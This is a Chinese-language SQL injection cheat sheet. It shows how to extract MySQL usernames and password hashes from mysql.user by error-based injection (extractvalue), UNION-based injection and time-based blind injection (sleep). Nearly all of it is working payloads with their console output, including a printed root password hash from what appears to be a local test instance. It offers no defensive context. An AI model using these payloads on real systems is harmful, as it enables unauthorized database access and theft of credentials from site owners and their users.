0x00 记忆方式
select host, user, password from mysql.user
mysql> select host, user, password from mysql.user;
+-----------+------+-------------------------------------------+
| host | user | password |
+-----------+------+-------------------------------------------+
| localhost | root | *81F5E21E35407D884A6CD4A731AEBFB6AF209E1B |
| 127.0.0.1 | root | *81F5E21E35407D884A6CD4A731AEBFB6AF209E1B |
| ::1 | root | *81F5E21E35407D884A6CD4A731AEBFB6AF209E1B |
+-----------+------+-------------------------------------------+
3 rows in set (0.00 sec)
0x01 爆错注入获取
注意: limit 0 表示要显示那一条数据
limit 0 表示第一条
limit 1 表示第二条
select extractvalue(1,(select distinct concat(0x7e,host,0x7e,user,0x7e,password) from mysql.user limit 0, 1))
mysql> select extractvalue(1,(select distinct concat(0x7e,host,0x7e,user,0x7e,password) from mysql.user limit 0, 1));
ERROR 1105 (HY000): XPATH syntax error: '~localhost~root~*81F5E21E35407D8'
0x02 union联合注入获取
注意: limit 0 表示要显示那一条数据
limit 0 表示第一条
limit 1 表示第二条
# 演示数据
mysql> select * from test;
+------+------+------+---------+
| id | test | map | content |
+------+------+------+---------+
| 1 | 1 | 1 | 1 |
| 2 | 2 | 2 | 2 |
| 3 | 3 | 3 | 3 |
+------+------+------+---------+
3 rows in set (0.00 sec)
# 显示列数
mysql> select * from test where 1=2 union select 1,2,3,4;
+------+------+------+---------+
| id | test | map | content |
+------+------+------+---------+
| 1 | 2 | 3 | 4 |
+------+------+------+---------+
1 row in set (0.00 sec)
# 显示数据
mysql> select * from test where 1=2 union select 1,(select distinct concat(0x7e,host,0x7e,user,0x7e,password) from mysql.user limit 0, 1),3,4;
+------+-----------------------------------------------------------+------+---------+
| id | test | map | content |
+------+-----------------------------------------------------------+------+---------+
| 1 | ~localhost~root~*81F5E21E35407D884A6CD4A731AEBFB6AF209E1B | 3 | 4 |
+------+-----------------------------------------------------------+------+---------+
1 row in set (0.00 sec)
0x03 盲注获取
# 测试数据
mysql> select distinct concat(0x7e,host,0x7e,user,0x7e,password) from mysql.user limit 0, 1;
+-----------------------------------------------------------+
| concat(0x7e,host,0x7e,user,0x7e,password) |
+-----------------------------------------------------------+
| ~localhost~root~*81F5E21E35407D884A6CD4A731AEBFB6AF209E1B |
+-----------------------------------------------------------+
1 row in set (0.00 sec)
读 mysql.user表第一条数据第一个字: select * from test where id = 1 and if(substring((select distinct concat(0x7e,host,0x7e,user,0x7e,password) from mysql.user limit 0, 1),1,1)=’~’,sleep(5),1);
mysql> select * from test where id = 1 and if(substring((select distinct concat(0x7e,host,0x7e,user,0x7e,password) from mysql.user limit 0, 1),1,1)='~',sleep(5),1);
Empty set (5.00 sec)
读 mysql.user表第一条数据第二个字: select * from test where id = 1 and if(substring((select distinct concat(0x7e,host,0x7e,user,0x7e,password) from mysql.user limit 0, 1),2,1)=’l’,sleep(5),1);
mysql> select * from test where id = 1 and if(substring((select distinct concat(0x7e,host,0x7e,user,0x7e,password) from mysql.user limit 0, 1),2,1)='l',sleep(5),1);
Empty set (5.00 sec)